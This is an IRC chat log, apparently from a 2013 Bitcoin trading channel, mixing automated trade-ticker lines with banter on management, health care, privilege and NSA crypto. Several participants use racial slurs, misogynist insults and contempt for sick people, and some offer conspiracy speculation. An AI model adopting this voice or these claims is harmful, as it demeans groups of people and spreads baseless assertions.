20:55:54 i'd rather talk to a random nevada hooker about her love life Sep 14 20:56:03 than to a random trade press ho about anything at all. Sep 14 20:56:36 i'm more interested in your anthropological take, mon frere Sep 14 20:56:59 anthropological/satirical take Sep 14 20:57:12 yeah. but atm i ain't :) Sep 14 20:57:32 [BTCTC] [LABCOIN] 35 @ 0.002244 = 0.0785 BTC [-] Sep 14 20:57:52 ain't takin? Sep 14 20:58:25 or interested. Sep 14 20:59:39 bah Sep 14 21:00:46 what fucking difference does it make. the few talented women are working. the abundant klutzes that are too stupid to turn tricks are talking about how unfair it is they're stupid. Sep 14 21:00:54 hasn';t changed, won't change, nobody gives a shit. Sep 14 21:01:33 [MPEX] [S.MPOE] 3266 @ 0.00089319 = 2.9172 BTC [+] Sep 14 21:01:35 [MPEX] [S.MPOE] 1234 @ 0.00089344 = 1.1025 BTC [+] Sep 14 21:01:44 for that matter : most of my employees are female. and by most i don't mean relative most, i mean something like 74% Sep 14 21:01:59 i wrote about how adria richards raep on my blog. Sep 14 21:02:05 [MPEX] [S.MPOE] 5100 @ 0.00089286 = 4.5536 BTC [-] Sep 14 21:02:10 get back to me when any of the "concerned" parties matches the data, i might care. Sep 14 21:04:57 "By degrees the anarchy finds a way into private houses, and ends by getting among the animals and infecting them... the father grows accustomed to descend to the level of his sons and to fear them, and the son is on a level with his father, he having no respect or reverence for either of his parents; and this is his freedom, and the metic is equal with the citizen and the citizen with the metic, and Sep 14 21:04:59 the stranger is quite as good as either." Sep 14 21:05:21 I had a conversation with someone recently who was having trouble hiring people. Sep 14 21:05:39 (american computation industry, if you're not aware, is scraping the barrel of humans capable of making computers do things) Sep 14 21:05:59 he was so resistant to the idea of telling his people what to do Sep 14 21:06:25 seemed to be relatively incompetent except for being able to make friends with moderately-competent humans, put them in a room and let them self-organize into a software development team Sep 14 21:06:53 except oh no, now he has bus-factor problems. and oh no, now he can't find any more people who already know how to do the work, and oh no, never bothered to implement a training plan Sep 14 21:07:58 i eventually lost my cool and said "yeah. you have to manage them. if you have such a tightly limited budget that you can only afford one human and not the additional team bandwidth to train that human, your entire management philosophy is borked." Sep 14 21:08:14 descending into sarcasm, "oh, you mean I have to manage these people? tell them what to do etc?" Sep 14 21:08:20 *rage rage rage* Sep 14 21:08:55 yes. yes you do. until they demonstrate that they know what to do on their own (which seems unlikely), you must give direction. Sep 14 21:09:29 seemed to be relatively incompetent except for being able to make friends with moderately-competent humans, put them in a room and let them self-organize into a software development team << herp. Sep 14 21:09:34 that's not needed and not useful. Sep 14 21:09:52 the mericans have compleltely forgotten what management is. hence, Sep 14 21:10:13 "I’ve been out of the business for so long I’m about as rusty on the topic as your average American business man is when it comes to doing business." Sep 14 21:10:31 [BTCTC] [LABCOIN] 322 @ 0.002238 = 0.7206 BTC [-] Sep 14 21:10:32 [BTCTC] [LABCOIN] 1024 @ 0.002239 = 2.2927 BTC [+] Sep 14 21:10:33 [BTCTC] [LABCOIN] 702 @ 0.00224 = 1.5725 BTC [+] Sep 14 21:10:34 [BTCTC] [LABCOIN] 84 @ 0.002244 = 0.1885 BTC [+] Sep 14 21:10:35 [BTCTC] [LABCOIN] 58 @ 0.002245 = 0.1302 BTC [+] Sep 14 21:10:36 [BTCTC] [LABCOIN] 5 @ 0.002246 = 0.0112 BTC [+] Sep 14 21:10:37 [BTCTC] [LABCOIN] 192 @ 0.002265 = 0.4349 BTC [+] Sep 14 21:10:38 [BTCTC] [LABCOIN] 96 @ 0.002266 = 0.2175 BTC [+] Sep 14 21:10:39 [BTCTC] [LABCOIN] 200 @ 0.002283 = 0.4566 BTC [+] Sep 14 21:10:40 [BTCTC] [LABCOIN] 100 @ 0.002284 = 0.2284 BTC [+] Sep 14 21:10:41 [BTCTC] [LABCOIN] 30 @ 0.0023 = 0.069 BTC [+] Sep 14 21:10:42 [BTCTC] [LABCOIN] 97 @ 0.002302 = 0.2233 BTC [+] Sep 14 21:10:43 [BTCTC] [LABCOIN] 98 @ 0.00232 = 0.2274 BTC [+] Sep 14 21:10:43 [BTCTC] [LABCOIN] 95 @ 0.002338 = 0.2221 BTC [+] Sep 14 21:10:44 [BTCTC] [LABCOIN] 200 @ 0.002339 = 0.4678 BTC [+] Sep 14 21:10:46 [BTCTC] [LABCOIN] 200 @ 0.002342 = 0.4684 BTC [+] Sep 14 21:10:47 [BTCTC] [LABCOIN] 200 @ 0.002347 = 0.4694 BTC [+] Sep 14 21:10:48 [BTCTC] [LABCOIN] 320 @ 0.002354 = 0.7533 BTC [+] Sep 14 21:10:49 [MPEX] [S.MPOE] 6691 @ 0.00089344 = 5.978 BTC [+] Sep 14 21:10:50 [MPEX] [S.MPOE] 1986 @ 0.00089433 = 1.7761 BTC [+] Sep 14 21:11:09 eyah Sep 14 21:11:22 [BTCTC] [LABCOIN] 209 @ 0.002336 = 0.4882 BTC [-] Sep 14 21:11:39 i must be getting older. i see more herp every day. Sep 14 21:12:25 [BTCTC] [LABCOIN] 150 @ 0.002354 = 0.3531 BTC [+] Sep 14 21:12:39 americans are too expensive anyway, for their "talent". Sep 14 21:13:01 livin here ain't cheap >.< Sep 14 21:13:02 [BTCTC] [LABCOIN] 10 @ 0.002354 = 0.0235 BTC [+] Sep 14 21:13:05 you make more trolling the webcam sites looking for russian speaking college undergrds camwhoring out of sheer starvation and spending half year teaching them to code Sep 14 21:13:06 it's just a labor market disconnect Sep 14 21:13:21 than you'd ever make hiring western "talent" and spending two years trying to teach them to fucking behave. Sep 14 21:13:33 i just snipe the smart, compliant ones out of math programs. Sep 14 21:13:34 [BTCTC] [LABCOIN] 44 @ 0.002354 = 0.1036 BTC [+] Sep 14 21:13:44 you're still overpaying. Sep 14 21:14:00 eh, no worries, they'll be getting cheaper soon enough. Sep 14 21:14:02 maybe in some global market sense, but costs are still a fraction of revenues. Sep 14 21:14:19 plus i like being physically around smart, pretty humans. Sep 14 21:14:42 and living in the US. Sep 14 21:14:50 there are constraints under which i operate, sir. Sep 14 21:15:18 also if your shop relies on 'human compilers,' your soul is damned no matter what. Sep 14 21:15:33 Duffer1 it's the same everywjhere dood. Sep 14 21:15:39 argentina 2 bedroom apt = 500 usd. Sep 14 21:15:49 [BTCTC] [TAT.ASICMINER] 25 @ 0.0202 = 0.505 BTC [+] Sep 14 21:15:56 ^ not if you have health problems :/ Sep 14 21:15:56 you all buy your shit from china so it also costs exactly the same. Sep 14 21:16:07 anyways. time for duck eggs and jowl bacon Sep 14 21:16:11 i believe the idea is "fuck you if you have health problems" Sep 14 21:16:37 mircea_popescu: "The Colt '45 Health and Life Insurance Corp." ? Sep 14 21:16:39 ya that's pretty much correct, republican health plan: "don't get sick" Sep 14 21:16:53 asciilifeform just a little thing called evolution. Sep 14 21:17:48 democrats health plan: "ok insurance lobby, but at least let me lube up firAGGGHHH" Sep 14 21:17:54 mircea_popescu: perhaps we should all switch to hiring bacteria as developers: they don't fall ill, virtually immortal... pinnacle of evolution! Sep 14 21:18:37 weren't people talking about biocomputers before the current quantum craze ? Sep 14 21:18:55 mircea_popescu: sure. that grant money won't embezzle itself. Sep 14 21:19:01 lol. Sep 14 21:19:12 anyway! here's the thing with sickness as defined by the western mind : Sep 14 21:19:36 1. you don't get to fuck up yhour environment and eat arsenic in chicken eggs your entire life and then expect me to care. match the indian or get lost ; Sep 14 21:19:55 2. you don't get to imagine diseases and all the rest of contrivances and then get me to care. again, match the other dood or get lost. Sep 14 21:20:19 this entire system whereby the us gets itself drunk on tap water and "leads" the world into nonsense only works if you've had enough tap water. Sep 14 21:20:43 back at reality ranch, us matches the rest or gets cast to the side as any random cumrag. Sep 14 21:20:54 which, obviously, isn't all that far off. Sep 14 21:21:16 [MPEX] [S.MPOE] 9662 @ 0.00089433 = 8.641 BTC [+] Sep 14 21:21:20 mircea_popescu: let me know where on this planet I can get some milk w/out Sr-90 in it. Sep 14 21:21:41 w/o to what level ? Sep 14 21:21:56 1944 level. Sep 14 21:21:57 (it is naturally occuring you know) Sep 14 21:22:03 patagonia. Sep 14 21:22:20 wouldn't bet on it Sep 14 21:22:23 i measured it. Sep 14 21:23:21 mircea_popescu: care to elaborate? Sep 14 21:23:39 well, my cto is currently on mission in argentina, measuring the place up and down. Sep 14 21:24:25 do they still have that nature preserve down there? with live nazis? Sep 14 21:24:26 im not even kidding, btw. Sep 14 21:24:36 apparently the nazis are all but gone. Sep 14 21:24:44 whatta shame Sep 14 21:24:51 well people only live to like 90 or something Sep 14 21:25:27 i suppose now you'll tell us they don't breed true, either. Sep 14 21:25:53 that's an entirely different discussion. Sep 14 21:26:22 [BTCTC] [ACTIVEMINING] 28 @ 0.002603 = 0.0729 BTC [+] Sep 14 21:27:25 [BTCTC] [DMS.MINING] 25 @ 0.002679 = 0.067 BTC [+] Sep 14 21:29:50 anyway. it's kinda sad none of the privilege analysts has the endurance. it'd be pretty fun to have one in here to mash into a pulp Sep 14 21:30:03 someone needs to provide the "libertard chewtoy for hire" service. Sep 14 21:30:24 what the devil is a privilege analyst? Sep 14 21:30:34 [BTCTC] [LABCOIN] 5 @ 0.002354 = 0.0118 BTC [+] Sep 14 21:30:36 [BTCTC] [LABCOIN] 195 @ 0.002354 = 0.459 BTC [+] Sep 14 21:31:58 one of those people who include the concept of "privilege" into any discussion at all. Sep 14 21:32:19 for instance, they'd state that my "fuck you if you get sick" above reflects my own priviledged thinking as someone who;s healthy. Sep 14 21:32:41 when do we get "the unfair privilege of being still alive" ? Sep 14 21:32:53 it's there, at the root of it all, unspoken. Sep 14 21:33:10 the cruft coming out of us "humanities" programs is woefully illiterate, they have no idea what the history of thought looks like Sep 14 21:33:15 certainly not pre fdr. Sep 14 21:33:57 "The Ogre cannot master Speech..." Sep 14 21:34:44 The Ogre stalks with hands on hips, that one ? Sep 14 21:34:50 yeah Sep 14 21:35:07 the brit does not include enough fucking in his essay. Sep 14 21:36:58 i'm rewriting this. Sep 14 21:42:46 [BTCTC] [DMS.MINING] 1 @ 0.002676 BTC [-] Sep 14 21:44:29 [BTCTC] [B.YABMC] 1 @ 0.001199 BTC [-] Sep 14 21:45:53 [BTCTC] [DMS.SELLING] 17 @ 0.009431 = 0.1603 BTC [+] Sep 14 21:47:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000635 BTC [+] Sep 14 21:47:19 [BTCTC] [DMS.PURCHASE] 16 @ 0.01193 = 0.1909 BTC [+] Sep 14 21:53:16 [BTCTC] [DMS.MINING] 1 @ 0.00261 BTC [-] Sep 14 21:53:18 [BTCTC] [DMS.MINING] 15 @ 0.002585 = 0.0388 BTC [-] Sep 14 21:54:12 [HAVELOCK] [CBTC] 100 @ 0.0003999 = 0.04 BTC [+] Sep 14 21:54:15 [MPEX] [S.MPOE] 2929 @ 0.00089286 = 2.6152 BTC [-] Sep 14 21:55:17 [BTCTC] [LABCOIN] 1 @ 0.002215 BTC [-] Sep 14 21:55:30 [BTCTC] [ACTIVEMINING] 2 @ 0.002735 = 0.0055 BTC [+] Sep 14 21:55:40 [BTCTC] [LABCOIN] 1 @ 0.002215 BTC [-] Sep 14 21:57:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.0202 = 0.0606 BTC [+] Sep 14 21:57:53 [BTCTC] [LABCOIN] 1 @ 0.002297 BTC [+] Sep 14 21:58:17 [BTCTC] [LABCOIN] 31 @ 0.002297 = 0.0712 BTC [+] Sep 14 22:10:50 [BTCTC] [ASICMINER-PT] 5 @ 2.059 = 10.295 BTC [+] Sep 14 22:12:08 [HAVELOCK] [XBOND] 10 @ 0.00118898 = 0.0119 BTC [+] Sep 14 22:13:27 [HAVELOCK] [XBOND] 10 @ 0.00118899 = 0.0119 BTC [+] Sep 14 22:15:52 [HAVELOCK] [XBOND] 72 @ 0.001189 = 0.0856 BTC [+] Sep 14 22:17:21 [BTCTC] [BTC-GOLD] 4 @ 0.0075 = 0.03 BTC [-] Sep 14 22:19:09 [HAVELOCK] [HIM] 7 @ 0.155 = 1.085 BTC [-] Sep 14 22:20:15 [BTCTC] [BTC-GROWTH] 5 @ 0.1001 = 0.5005 BTC [-] Sep 14 22:20:16 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Sep 14 22:20:18 [BTCTC] [ASICMINER-PT] 6 @ 2.059 = 12.354 BTC [+] Sep 14 22:20:35 [HAVELOCK] [XBOND] 1200 @ 0.001189 = 1.4268 BTC [+] Sep 14 22:21:30 [BTCTC] [ASICMINER-PT] 12 @ 2.06 = 24.72 BTC [+] Sep 14 22:22:28 [BTCTC] [ACTIVEMINING] 2 @ 0.002603 = 0.0052 BTC [-] Sep 14 22:27:43 [HAVELOCK] [XBOND] 10 @ 0.00116001 = 0.0116 BTC [-] Sep 14 22:28:43 [HAVELOCK] [XBOND] 34 @ 0.00116 = 0.0394 BTC [-] Sep 14 22:39:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.0202 = 0.101 BTC [+] Sep 14 22:41:50 asciilifeform http://trilema.com/2013/the-progre/ Sep 14 22:41:50 [BTCTC] [ASICMINER-PT] 2 @ 2.096 = 4.192 BTC [+] Sep 14 22:43:18 [BTCTC] [ASICMINER-PT] 1 @ 2.097 BTC [+] Sep 14 22:43:58 [BTCTC] [PETA-MINE] 1 @ 0.6598 BTC [+] Sep 14 22:46:32 mircea_popescu: hehe, good wurk Sep 14 22:46:38 [BTCTC] [ASICMINER-PT] 2 @ 2.105 = 4.21 BTC [+] Sep 14 22:47:00 [BTCTC] [ASICMINER-PT] 1 @ 2.106 BTC [+] Sep 14 22:48:19 i deny any involvement. Sep 14 23:00:46 [BTCTC] [ASICMINER-PT] 1 @ 2.108 BTC [+] Sep 14 23:00:47 [BTCTC] [ASICMINER-PT] 1 @ 2.109 BTC [+] Sep 14 23:00:48 [BTCTC] [ASICMINER-PT] 5 @ 2.11 = 10.55 BTC [+] Sep 14 23:00:50 [BTCTC] [ASICMINER-PT] 5 @ 2.115 = 10.575 BTC [+] Sep 14 23:00:51 [BTCTC] [ASICMINER-PT] 10 @ 2.12 = 21.2 BTC [+] Sep 14 23:00:52 [BTCTC] [ASICMINER-PT] 5 @ 2.125 = 10.625 BTC [+] Sep 14 23:00:53 [BTCTC] [ASICMINER-PT] 2 @ 2.128 = 4.256 BTC [+] Sep 14 23:01:32 [BTCTC] [LABCOIN] 1 @ 0.00225 BTC [-] Sep 14 23:02:06 [BTCTC] [BITVPS] 6 @ 0.00195 = 0.0117 BTC [-] Sep 14 23:02:40 [BTCTC] [BITVPS] 500 @ 0.00193 = 0.965 BTC [-] Sep 14 23:03:20 [BTCTC] [BITVPS] 28 @ 0.001901 = 0.0532 BTC [-] Sep 14 23:03:22 [BTCTC] [BITVPS] 100 @ 0.0019 = 0.19 BTC [-] Sep 14 23:05:21 Namworld is da coolest Sep 14 23:05:55 from theory into practice: http://spritesmods.com/?art=hddhack Sep 14 23:06:33 [BTCTC] [BITVPS] 1 @ 0.00181 BTC [-] Sep 14 23:06:35 [BTCTC] [BITVPS] 40 @ 0.001807 = 0.0723 BTC [-] Sep 14 23:06:36 [BTCTC] [BITVPS] 100 @ 0.0018 = 0.18 BTC [-] Sep 14 23:06:37 [BTCTC] [BITVPS] 70 @ 0.0018 = 0.126 BTC [-] Sep 14 23:06:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0202 BTC [+] Sep 14 23:12:17 [BTCTC] [LABCOIN] 287 @ 0.00225 = 0.6458 BTC [-] Sep 14 23:15:33 What? Sep 14 23:16:40 [HAVELOCK] [AM100] 1 @ 0.020499 BTC [-] Sep 14 23:18:10 [HAVELOCK] [XBOND] 6 @ 0.001189 = 0.0071 BTC [+] Sep 14 23:22:47 [BTCTC] [LABCOIN] 60 @ 0.00225 = 0.135 BTC [-] Sep 14 23:22:48 [BTCTC] [LABCOIN] 20 @ 0.00222 = 0.0444 BTC [-] Sep 14 23:29:33 [BTCTC] [DMS.PURCHASE] 15 @ 0.01193 = 0.179 BTC [+] Sep 14 23:37:33 [MPEX] [S.MPOE] 4726 @ 0.00089179 = 4.2146 BTC [-] Sep 14 23:37:35 [MPEX] [S.MPOE] 2074 @ 0.00089157 = 1.8491 BTC [-] Sep 14 23:40:05 1Rejection reason: Easy to falsify with help from friendly miner. " Sep 14 23:40:10 [HAVELOCK] [LABCO] 55 @ 0.00228 = 0.1254 BTC [-] Sep 14 23:40:14 there aren't many people able to fake 1 TH/s… Sep 14 23:40:52 pankkake you just need a few blocks. Sep 14 23:40:52 [BTCTC] [LABCOIN] 11 @ 0.00222 = 0.0244 BTC [-] Sep 14 23:40:59 what, you want mod to time them or something ? Sep 14 23:41:40 [BTCTC] [ACTIVEMINING] 9 @ 0.002699 = 0.0243 BTC [+] Sep 14 23:41:47 I don't see any other way to make the bet Sep 14 23:42:00 i know. Sep 14 23:43:08 mircea_popescu: where are you considering settling in argentina? Sep 14 23:43:11 where in argentina... Sep 14 23:43:14 lol Sep 14 23:44:45 i'm visiting in november for reasons of lolbitrage Sep 14 23:44:49 https://www.youtube.com/embed/DU3dXkmamZg Sep 14 23:46:07 that'll teach me to open -assets links with anyone in the room Sep 14 23:46:39 "slut sluts" Sep 14 23:46:42 the butthurt on him is lulzy Sep 14 23:46:53 "omfg girls get into bed with any guy just cause he has a whip" Sep 14 23:46:56 well... yeah ? Sep 14 23:47:07 [BTCTC] [PETA-MINE] 1 @ 0.642 BTC [-] Sep 14 23:47:19 I like these frank rankts. Sep 14 23:47:25 [BTCTC] [PETA-MINE] 1 @ 0.642 BTC [-] Sep 14 23:50:09 MP, who is this guy? He is hilarious. Sep 14 23:50:27 LOL: https://www.youtube.com/embed/DU3dXkmamZg Sep 14 23:50:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.0202 = 0.1414 BTC [+] Sep 14 23:50:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.0202 = 0.202 BTC [+] Sep 14 23:50:38 [BTCTC] [TAT.ASICMINER] 25 @ 0.02022 = 0.5055 BTC [+] Sep 14 23:52:12 that's thestringpuller irl. Sep 14 23:52:14 you didn't know ? Sep 14 23:52:27 lies. Sep 14 23:52:35 lol ok you got me. Sep 14 23:52:41 i have no fucking idea who he is. Sep 14 23:52:52 I like his rants. Sep 14 23:53:00 by the way, if anyone has a mic and a voice : https://bitcointalk.org/index.php?topic=294373.new#new Sep 14 23:53:06 read my poem, win a bitcoin. Sep 14 23:53:18 Well I don't know why but I'm da coolest now. Does that come with any sort of responsibilities or something? Sep 14 23:53:53 [HAVELOCK] [XBOND] 7 @ 0.001189 = 0.0083 BTC [+] Sep 14 23:54:16 haha you used the clit size vid Sep 14 23:54:19 Furthermore, accents are welcome, especially Yiddish or any version of comical French. Sep 14 23:54:32 well looks like I'm your man, I'll try tomorrow Sep 14 23:55:12 my voice is considered monotonous though Sep 14 23:56:22 so great opportunity to improve Sep 14 23:57:04 I used to publish podcasts where I basically talked about/to myself Sep 14 23:57:09 reeses you got a mic man ? Sep 14 23:57:30 pankkake so how'd that go ? Sep 14 23:57:41 I had about ~10 listeners Sep 14 23:59:14 sounds like the internet. Sep 14 23:59:37 [MPEX] [S.MPOE] 1622 @ 0.00089157 = 1.4461 BTC [-] Sep 15 00:03:25 [BTCTC] [BITVPS] 85 @ 0.002069 = 0.1759 BTC [+] Sep 15 00:03:33 "A privilege is a special entitlement to immunity granted by the state or another authority to a restricted group, either by birth or on a conditional basis." Sep 15 00:04:36 [BTCTC] [LABCOIN] 869 @ 0.00222 = 1.9292 BTC [-] Sep 15 00:04:38 [BTCTC] [LABCOIN] 15 @ 0.002201 = 0.033 BTC [-] Sep 15 00:04:39 [BTCTC] [LABCOIN] 150 @ 0.0022 = 0.33 BTC [-] Sep 15 00:04:40 [BTCTC] [LABCOIN] 52 @ 0.002194 = 0.1141 BTC [-] Sep 15 00:04:40 [BTCTC] [LABCOIN] 521 @ 0.002187 = 1.1394 BTC [-] Sep 15 00:04:42 [BTCTC] [LABCOIN] 38 @ 0.002183 = 0.083 BTC [-] Sep 15 00:04:43 [BTCTC] [LABCOIN] 380 @ 0.002182 = 0.8292 BTC [-] Sep 15 00:04:44 [BTCTC] [LABCOIN] 100 @ 0.002181 = 0.2181 BTC [-] Sep 15 00:04:45 [BTCTC] [LABCOIN] 241 @ 0.00218 = 0.5254 BTC [-] Sep 15 00:06:24 [HAVELOCK] [AM100] 2 @ 0.0194 = 0.0388 BTC [-] Sep 15 00:06:39 a privilege is no such thing. Sep 15 00:06:46 [HAVELOCK] [AM100] 10 @ 0.0192 = 0.192 BTC [-] Sep 15 00:07:00 a privilege is a remnant of personal sovereignity recognised and perpetuated by some ulterior power such as some state or other. Sep 15 00:07:50 i'm privileged you would even show up to this fake shit Sep 15 00:08:35 this is why privilege is claimed (it's my privilege), recognised and confirmed, but never granted. Sep 15 00:08:47 at most some sort of written certification of recognition may be granted, but that's different. Sep 15 00:09:19 [BTCTC] [BASIC-MINING] 10 @ 0.124 = 1.24 BTC [-] Sep 15 00:09:40 and so that's why it goes "letters patent confirming the X priviledge were granted to Y group". Sep 15 00:10:03 [BTCTC] [LABCOIN] 75 @ 0.002181 = 0.1636 BTC [+] Sep 15 00:10:33 [MPEX] [S.MPOE] 2800 @ 0.00089221 = 2.4982 BTC [+] Sep 15 00:10:37 [BTCTC] [LABCOIN] 759 @ 0.00218 = 1.6546 BTC [-] Sep 15 00:10:57 [BTCTC] [LABCOIN] 46 @ 0.002163 = 0.0995 BTC [-] Sep 15 00:11:15 [BTCTC] [LABCOIN] 4 @ 0.002161 = 0.0086 BTC [-] Sep 15 00:11:17 [BTCTC] [LABCOIN] 16 @ 0.00216 = 0.0346 BTC [-] Sep 15 00:11:45 [HAVELOCK] [XBOND] 40 @ 0.001189 = 0.0476 BTC [+] Sep 15 00:12:00 [BTCTC] [DMS.SELLING] 50 @ 0.009431 = 0.4716 BTC [+] Sep 15 00:12:13 hence the humor inspired by people running around hooting about privilege Sep 15 00:12:29 listen, if i'm privileged, i don't have to deal with your idiot notions of power. Sep 15 00:12:43 [HAVELOCK] [AM100] 50 @ 0.01916001 = 0.958 BTC [-] Sep 15 00:12:47 [HAVELOCK] [AM100] 3 @ 0.01916001 = 0.0575 BTC [-] Sep 15 00:12:51 [HAVELOCK] [AM100] 10 @ 0.0191 = 0.191 BTC [-] Sep 15 00:12:54 [HAVELOCK] [AM100] 10 @ 0.01901 = 0.1901 BTC [-] Sep 15 00:12:58 [HAVELOCK] [AM100] 86 @ 0.0190001 = 1.634 BTC [-] Sep 15 00:13:02 [HAVELOCK] [AM100] 118 @ 0.01900001 = 2.242 BTC [-] Sep 15 00:13:08 i hope you realise this means war!! Sep 15 00:13:12 [BTCTC] [DMS.SELLING] 1 @ 0.009261 BTC [-] Sep 15 00:13:14 [BTCTC] [DMS.PURCHASE] 50 @ 0.01193 = 0.5965 BTC [+] Sep 15 00:13:28 by all means, mobilize your sheep Sep 15 00:13:45 i'm sufficiently isolated to not care Sep 15 00:13:45 [BTCTC] [LABCOIN] 2 @ 0.002161 = 0.0043 BTC [+] Sep 15 00:13:48 BY MY PRIVILEGE Sep 15 00:13:51 montjoie st denis! Sep 15 00:14:13 [HAVELOCK] [AM100] 114 @ 0.01900001 = 2.166 BTC [-] Sep 15 00:14:20 [HAVELOCK] [AM100] 17 @ 0.019 = 0.323 BTC [-] Sep 15 00:14:23 [HAVELOCK] [AM100] 5 @ 0.019 = 0.095 BTC [-] Sep 15 00:14:27 [HAVELOCK] [AM100] 10 @ 0.0187 = 0.187 BTC [-] Sep 15 00:14:29 [BTCTC] [DMS.SELLING] 50 @ 0.009431 = 0.4716 BTC [+] Sep 15 00:14:31 [HAVELOCK] [AM100] 54 @ 0.01860001 = 1.0044 BTC [-] Sep 15 00:14:31 you'll note i can still pay my armsmen Sep 15 00:14:54 my gunslingers' powder remains dry Sep 15 00:15:15 [BTCTC] [DMS.PURCHASE] 50 @ 0.01193 = 0.5965 BTC [+] Sep 15 00:15:21 rise up ye masses Sep 15 00:15:42 [HAVELOCK] [SDSTM] 5 @ 0.00233 = 0.0117 BTC [-] Sep 15 00:15:46 [HAVELOCK] [SDSTM] 3 @ 0.00232011 = 0.007 BTC [-] Sep 15 00:15:48 [HAVELOCK] [SDSTM] 11 @ 0.00232011 = 0.0255 BTC [-] Sep 15 00:15:52 [HAVELOCK] [SDSTM] 200 @ 0.0023201 = 0.464 BTC [-] Sep 15 00:15:55 [BTCTC] [LABCOIN] 2 @ 0.002161 = 0.0043 BTC [+] Sep 15 00:15:57 [BTCTC] [LABCOIN] 27 @ 0.00216 = 0.0583 BTC [-] Sep 15 00:15:58 [HAVELOCK] [SDSTM] 289 @ 0.00231001 = 0.6676 BTC [-] Sep 15 00:16:08 we have Brownings atop this castle. Sep 15 00:16:23 [BTCTC] [LABCOIN] 2 @ 0.00216 = 0.0043 BTC [-] Sep 15 00:16:25 [BTCTC] [LABCOIN] 18 @ 0.002158 = 0.0388 BTC [-] Sep 15 00:16:26 [BTCTC] [LABCOIN] 180 @ 0.002157 = 0.3883 BTC [-] Sep 15 00:16:34 [HAVELOCK] [HIM] 9 @ 0.155 = 1.395 BTC [-] Sep 15 00:16:43 [BTCTC] [LABCOIN] 46 @ 0.002125 = 0.0978 BTC [-] Sep 15 00:17:08 [BTCTC] [LABCOIN] 75 @ 0.002124 = 0.1593 BTC [-] Sep 15 00:17:15 i will rain steel death upon ye Sep 15 00:17:15 [BTCTC] [DMS.MINING] 1 @ 0.002588 BTC [+] Sep 15 00:17:16 [BTCTC] [DMS.MINING] 49 @ 0.002587 = 0.1268 BTC [-] Sep 15 00:17:17 [BTCTC] [DMS.MINING] 31 @ 0.002586 = 0.0802 BTC [-] Sep 15 00:17:18 [BTCTC] [DMS.MINING] 4 @ 0.002585 = 0.0103 BTC [-] Sep 15 00:17:19 [BTCTC] [DMS.MINING] 15 @ 0.002582 = 0.0387 BTC [-] Sep 15 00:17:24 [HAVELOCK] [VTX] 2 @ 0.595 = 1.19 BTC [-] Sep 15 00:20:32 actually i prefer the Notorious BIG's approach: Sep 15 00:20:39 "Real bad boys move in silence and violence." Sep 15 00:23:26 I STAY ICY HOT DEEZ NIGGAS benkay Sep 15 00:24:27 thestringpuller: it's really you? Sep 15 00:26:41 let us all stay icy hot. Sep 15 00:28:46 stringpuller Sep 15 00:29:06 [16:05] Namworld is da coolest Sep 15 00:29:11 [MPEX] [S.MPOE] 8650 @ 0.00089221 = 7.7176 BTC [+] Sep 15 00:29:13 What was that about? Sep 15 00:29:16 jurov twas a joke. Sep 15 00:29:20 [BTCTC] [ACTIVEMINING] 30 @ 0.002697 = 0.0809 BTC [-] Sep 15 00:29:21 [BTCTC] [ACTIVEMINING] 10 @ 0.002698 = 0.027 BTC [+] Sep 15 00:29:34 [BTCTC] [ACTIVEMINING] 20 @ 0.0027 = 0.054 BTC [+] Sep 15 00:29:44 i know. just wanted to see if he reacts Sep 15 00:29:51 You popped out of nowhere with that. Did I do something or what? Sep 15 00:30:05 YOU DID SOMETHING AWESOME Sep 15 00:30:07 your code got me laid Sep 15 00:30:19 i want to hear more about this Sep 15 00:30:30 [HAVELOCK] [HIM] 10 @ 0.155 = 1.55 BTC [-] Sep 15 00:31:10 My portfolio tracking code? You used it to showcase your portfolio and found a bitcoiner who totally got horny looking at it? Sep 15 00:31:15 What? Sep 15 00:31:49 [BTCTC] [LABCOIN] 46 @ 0.002122 = 0.0976 BTC [-] Sep 15 00:31:50 [BTCTC] [LABCOIN] 462 @ 0.002121 = 0.9799 BTC [-] Sep 15 00:31:51 [BTCTC] [LABCOIN] 9 @ 0.00212 = 0.0191 BTC [-] Sep 15 00:31:52 [BTCTC] [LABCOIN] 98 @ 0.002119 = 0.2077 BTC [-] Sep 15 00:31:53 [BTCTC] [LABCOIN] 54 @ 0.002112 = 0.114 BTC [-] Sep 15 00:31:55 [BTCTC] [LABCOIN] 306 @ 0.002111 = 0.646 BTC [-] Sep 15 00:32:07 Exactly Namworld Sep 15 00:32:11 this girl in my econ class Sep 15 00:32:20 she was like "That is the sexiest spreadsheet I've ever seen" Sep 15 00:32:24 on thing led to another Sep 15 00:32:35 her dorm mate leaves Sep 15 00:32:49 win Sep 15 00:32:51 No, that's not what happened! What the fuck is wrong with you people :P Sep 15 00:33:01 Namworld's bitvps rules and it's cheap Sep 15 00:33:10 if you believe that i have an asic ipo to sell you Sep 15 00:33:16 It's not really mine. Sep 15 00:33:19 someone else came with a whip and now thestringpuller is butthurt Sep 15 00:33:32 LOLOL Sep 15 00:34:39 thestringpuller is butthurt or thestringpuller's butt is hurt ? Sep 15 00:34:44 pls to not be confusing on the irc. Sep 15 00:35:11 hahaha' Sep 15 00:36:23 for anyone still following the cryptowank: https://www.schneier.com/blog/archives/2013/09/new_nsa_leak_sh.html (comments) Sep 15 00:38:24 I still follow the USA's screw ups, yes Sep 15 00:38:32 the cryptowank is dear to our hearts. Sep 15 00:38:40 i'm beginning to suspect that all crypto is broken and that this is a distraction a la dropping the dead diver in the water with important papers w/r/t spies to cover up the Enigma cracking circa wwii Sep 15 00:38:56 see also the trivial amounts of money being dribbled into d-wave Sep 15 00:38:57 benkay: disinfo, yeah Sep 15 00:39:08 operation whatver, i forget the precise name of the situation Sep 15 00:40:21 there's this idea floating around the quantum computing community that you can emulate certain types of quantum gate networks in traditional deterministic, irreversible silicon chip architectures Sep 15 00:40:34 people have even demonstrated it Sep 15 00:41:07 and given that the nsa figured out the fundamentals of rsa before rivest shamir and adelman, i'd bet they have a functional quantum emulator in silicon Sep 15 00:41:26 and that the snowden leak was so well pulled off because it's actually not real Sep 15 00:42:13 benkay all crypto is not broken, all businesses are not scams, all polticians are not corrupt, all governemnt is not welfare socialist crap, all niggers are not thieves, all women are not stupid Sep 15 00:42:21 wave hands Sep 15 00:42:23 and finally all generalisation is the work of the motherfucking devil. Sep 